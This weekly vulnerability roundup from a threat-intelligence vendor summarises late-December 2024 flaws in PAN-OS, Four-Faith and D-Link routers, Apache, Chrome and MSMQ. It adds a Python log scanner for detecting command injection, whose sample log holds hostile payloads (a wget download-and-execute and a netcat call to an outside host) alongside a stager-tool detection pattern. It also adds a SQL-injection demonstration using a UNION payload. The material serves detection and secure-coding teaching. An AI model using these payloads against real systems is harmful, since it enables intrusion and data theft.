The latest Weekly Vulnerability Report highlights critical flaws found from Dec 25-31, 2024, including risks in Palo Alto Networks firewalls, D-Link and Four-Faith routers, and CISA's KEV updates.
This week’s vulnerability report covers a broad range of critical and high-severity vulnerabilities identified from December 25 to December 31, 2024. It highlights several flaws that are being exploited or are likely to be, including new additions to CISA’s Known Exploited Vulnerabilities (KEV) catalog.
Among the most pressing is a vulnerability in Palo Alto Networks’ PAN-OS that has been actively exploited to knock firewalls offline: a malicious packet crashes the device and forces a reboot, interrupting the protection it provides. The Cybersecurity and Infrastructure Security Agency (CISA) added the flaw to its KEV catalog, confirming exploitation in the wild.
Beyond this, CRIL also analyzed multiple high-profile vulnerabilities affecting D-Link products and Four-Faith routers, both of which are widely deployed in Internet of Things (IoT) environments.
This week, CISA’s KEV catalog was updated to include a high-severity denial-of-service vulnerability in Palo Alto Networks PAN-OS (CVE-2024-3393). The flaw lies in the DNS Security feature’s handling of malformed DNS packets: an unauthenticated attacker can send a malicious packet through the firewall’s data plane to crash it and force a reboot, and repeated attempts push the firewall into maintenance mode. Only firewalls with DNS Security logging enabled are affected. Given its active exploitation, CISA has strongly urged organizations running Palo Alto Networks firewalls to move to the fixed PAN-OS releases (or, as an interim workaround, to disable DNS Security logging) to avoid outages.
Four-Faith routers are also affected by an OS command injection flaw (CVE-2024-12856). These cellular routers are widely used in IoT deployments, and many are still running the vendor’s default credentials; a remote attacker who logs in with those credentials can send a specially crafted HTTP request that injects shell commands. A successful attempt gives the attacker arbitrary command execution on the device, so changing the default credentials and keeping the management interface off the public internet are the immediate defences.
D-Link, one of the largest consumer and small-office networking vendors, remains a steady target of both vulnerability research and in-the-wild exploitation. CRIL analyzed multiple flaws affecting D-Link routers, including the DIR-806 (CVE-2019-10891), DIR-645 (CVE-2015-2051), and DIR-845L (CVE-2024-33112), among others. All are command injection vulnerabilities that let a remote attacker execute arbitrary commands on the device, which makes them convenient initial-access vectors for botnet malware; several are years old and remain exploitable only because the affected devices were never patched or are no longer supported.
Furthermore, D-Link’s GO-RT-AC750 (CVE-2022-37056) and the DIR-845L flaw noted above (CVE-2024-33112) were observed being exploited by the Ficora and Capsaicin botnets, which target outdated or end-of-life devices that no longer receive firmware updates. These findings emphasize the importance of updating D-Link devices where updates exist, replacing units the vendor no longer supports, and changing default credentials so attackers cannot simply log in.
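The Four-Faith and D-Link issues above are all OS command injection through HTTP request parameters. The following Python script is an added example, not code from the Cyble report or from either vendor: it scans web-server request logs for the tell-tale signs of such attempts (shell metacharacters and command-substitution syntax in URL-decoded parameter values, combined with the download-and-execute commands that router malware typically chains in). The log format, paths, parameter names, IP addresses and sample lines are constructed for this example and are not the real injection points of any CVE named here; the heuristics are generic rather than signatures for a specific flaw.

```python
"""
Added example (not from the Cyble report or any vendor): a heuristic
detector for OS command-injection attempts in HTTP request logs.
Log format, sample lines, paths and parameter names are constructed.
"""
import json
import re
from typing import List, Optional
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Shell constructs that rarely belong in a device-configuration value:
# command separators, pipes, backticks, $(...) and embedded newlines.
SHELL_META = re.compile(r";|\|\||\||&&|&|`|\$\(|\n|\r")
# Tools typically chained into an injected command to fetch and run a payload.
STAGER_CMDS = re.compile(r"\b(wget|curl|tftp|busybox|chmod|nc|telnetd|sh)\b")

# Constructed log format for this example (not a real vendor format):
# "<client> <METHOD> <target>[ body=<urlencoded form body>]"
LOG_LINE = re.compile(
    r"^(?P<src>\S+) (?P<method>[A-Z]+) (?P<target>\S+)(?: body=(?P<body>\S*))?$"
)

# Constructed sample traffic: two benign requests, two injection attempts
# (one single-encoded in a POST body, one double-encoded in a query string),
# and one benign value that merely contains an '&'.
SAMPLE_LOG = """\
203.0.113.7 POST /cgi-bin/apply.cgi body=year=2024&tz=UTC
203.0.113.9 POST /cgi-bin/apply.cgi body=year=2024%3Bwget+http%3A%2F%2F198.51.100.5%2Fb.sh+-O+%2Ftmp%2Fb%3Bsh+%2Ftmp%2Fb
198.51.100.23 GET /cgi-bin/status.cgi?action=GetStatus
198.51.100.23 GET /cgi-bin/status.cgi?action=GetStatus%2560busybox%2520nc%2520198.51.100.5%25204444%2560
192.0.2.10 GET /index.html?user=alice%26bob
"""


def decode_layers(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly; injected payloads are often double-encoded."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(value: str) -> List[str]:
    """Return the heuristic categories that fire on one parameter value."""
    decoded = decode_layers(value)
    hits = []
    if SHELL_META.search(decoded):
        hits.append("shell-metachar")
    if STAGER_CMDS.search(decoded):
        hits.append("stager-command")
    return hits


def analyze_line(line: str) -> Optional[dict]:
    """Parse one constructed log line and report suspicious parameters, if any."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    params = parse_qsl(parts.query, keep_blank_values=True)
    if m.group("body"):
        params += parse_qsl(m.group("body"), keep_blank_values=True)
    findings = []
    for name, value in params:
        hits = classify(value)
        if hits:
            # Metacharacters plus a stager command is a strong signal; metacharacters
            # alone (e.g. an '&' in a free-text field) only merits a low-priority look.
            severity = "high" if len(hits) == 2 else "low"
            findings.append({"param": name, "severity": severity, "hits": hits,
                             "decoded": decode_layers(value)})
    if not findings:
        return None
    return {"src": m.group("src"), "path": parts.path, "findings": findings}


def scan(log_text: str) -> List[dict]:
    """Run analyze_line over every line and collect the alerts in log order."""
    alerts = []
    for line in log_text.splitlines():
        result = analyze_line(line)
        if result:
            alerts.append(result)
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(json.dumps(alert))
```

Running the script prints one JSON alert per suspicious request. Parameter values are decoded up to three times before matching so that double URL-encoding, a common trick against naive filters, does not hide the payload; the benign `alice&bob` value is reported only as low severity, which is the trade-off a metacharacter heuristic always carries.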
The Apache Software Foundation also features in this week’s findings, with two critical vulnerabilities: one in Apache Traffic Control (CVE-2024-45387) and one in Apache HugeGraph-Server (CVE-2024-43441). The former is an SQL injection in Traffic Ops, the Traffic Control API component: an authenticated user holding one of several privileged roles (admin, federation, operations, portal or steering) can run arbitrary SQL against the backend database by sending a specially crafted PUT request; it is fixed in Traffic Control 8.0.2. The latter is an authentication bypass in Apache HugeGraph, an open-source graph database, that lets an attacker reach the server’s API without valid credentials; HugeGraph-Server 1.5.0 fixes it.
In the browser and web stack, Google Chrome (CVE-2024-9122) and the Angular Expressions library (CVE-2024-54152) also saw severe vulnerabilities this week. The Chrome issue is a type confusion bug in the V8 JavaScript engine: a crafted HTML page can trigger heap corruption in the renderer, the usual first step toward remote code execution, and Google fixed it in Chrome 129.0.6668.70. CVE-2024-54152 affects the angular-expressions npm package (the expression parser extracted from AngularJS) before version 1.4.3: an attacker who controls an expression string can break out of the intended evaluation and reach unsafe objects, which can lead to arbitrary code execution on the host that evaluates the expression.
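The Traffic Control flaw above is reachable only by users who already hold a privileged role, which is exactly the situation in which teams sometimes decide a query “does not need” parameterization. The Python snippet below is an added example, not Apache Traffic Control code or code from the report: it puts a role-gated handler built with string formatting beside the same handler using a bound parameter, against an in-memory SQLite database, to show that the authorization check does nothing to stop a privileged caller from reading tables the handler never meant to expose. The schema, rows, role names and injection payload are constructed for the illustration.

```python
"""
Added example (not Apache Traffic Control code or code from the report):
a role check on the caller is not a defence against SQL injection.
Schema, rows, roles and payload are constructed for this illustration.
"""
import sqlite3
from typing import List, Tuple

# Constructed payload: closes the string literal and UNIONs in a table the
# endpoint was never meant to return. The trailing comment swallows the
# quote that the vulnerable handler appends.
INJECTION = "x' UNION SELECT owner, secret FROM api_keys --"


def make_db() -> sqlite3.Connection:
    """Build a small in-memory database with a public and a sensitive table."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE servers (host TEXT, status TEXT);
        CREATE TABLE api_keys (owner TEXT, secret TEXT);
        INSERT INTO servers VALUES ('edge-1', 'ONLINE'), ('edge-2', 'OFFLINE');
        INSERT INTO api_keys VALUES ('ops', 'sk-constructed-secret');
    """)
    return con


def require_role(user: dict, role: str) -> None:
    """Authorization gate: only callers with the given role get past here."""
    if user.get("role") != role:
        raise PermissionError(f"role {role!r} required")


def list_servers_vulnerable(con: sqlite3.Connection, user: dict,
                            status: str) -> List[Tuple[str, str]]:
    """Role-gated, but interpolates the caller's input straight into SQL."""
    require_role(user, "admin")
    sql = f"SELECT host, status FROM servers WHERE status = '{status}'"
    return con.execute(sql).fetchall()


def list_servers_safe(con: sqlite3.Connection, user: dict,
                      status: str) -> List[Tuple[str, str]]:
    """Same gate, but the input travels as a bound parameter, never as SQL text."""
    require_role(user, "admin")
    return con.execute(
        "SELECT host, status FROM servers WHERE status = ?", (status,)
    ).fetchall()


def demo() -> dict:
    """Exercise both handlers with an admin and a non-admin caller."""
    con = make_db()
    admin = {"name": "alice", "role": "admin"}
    portal = {"name": "bob", "role": "portal"}
    try:
        list_servers_safe(con, portal, "ONLINE")
        rejected = False
    except PermissionError:
        rejected = True
    return {
        "normal": list_servers_vulnerable(con, admin, "ONLINE"),
        "vulnerable_leak": list_servers_vulnerable(con, admin, INJECTION),
        "safe_no_leak": list_servers_safe(con, admin, INJECTION),
        "non_admin_rejected": rejected,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

With an ordinary status value both handlers return the same rows; with the constructed payload the string-formatted handler hands the admin caller the contents of `api_keys`, while the parameterized handler simply finds no server whose status equals the literal payload. The non-admin caller is refused by both, which is the point: the role check limits who can call the endpoint, not what a caller can make the database do.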
CRIL researchers also monitored underground forums and Telegram channels, where they observed multiple Proof-of-Concept (PoC) exploits being shared. Among the vulnerabilities discussed were CVE-2023-21554 in Microsoft MSMQ and CVE-2024-54152 in Angular Expressions. Threat actors in these forums discussed active exploitation of both and shared tools and methods for attacking vulnerable systems.
The Microsoft Message Queuing (MSMQ) vulnerability (CVE-2023-21554), dubbed QueueJumper, is particularly concerning. It is an unauthenticated remote code execution (RCE) flaw: an attacker who can reach the MSMQ service on TCP port 1801 can execute arbitrary code on the server. MSMQ is an optional Windows component that is not enabled by default, and Microsoft fixed the bug in April 2023, so exposure is confined to hosts that both run the service and have missed that update. Even so, underground demand for working exploits against MSMQ servers remained high, with actors offering up to USD 1,000 for one.
Similarly, the Chrome flaw CVE-2024-9122 was widely discussed on dark web channels, where exploits for this high-severity bug were being weaponized against unpatched versions of the browser.
As always, CRIL stresses the importance of prompt patching and network defenses to protect against these cyber threats. Key recommendations include:
The latest Weekly Vulnerability Report from Cyble highlights critical security flaws across prominent platforms, including D-Link, Apache, and Palo Alto Networks. These vulnerabilities present significant risks to organizations worldwide. By leveraging Cyble’s threat intelligence solutions, including its AI-powered Cyble Vision platform, businesses can better protect themselves from emerging threats, respond faster, and reduce their exposure to cyber risk. Stay ahead of cybercriminals with Cyble’s cybersecurity tools and expert guidance.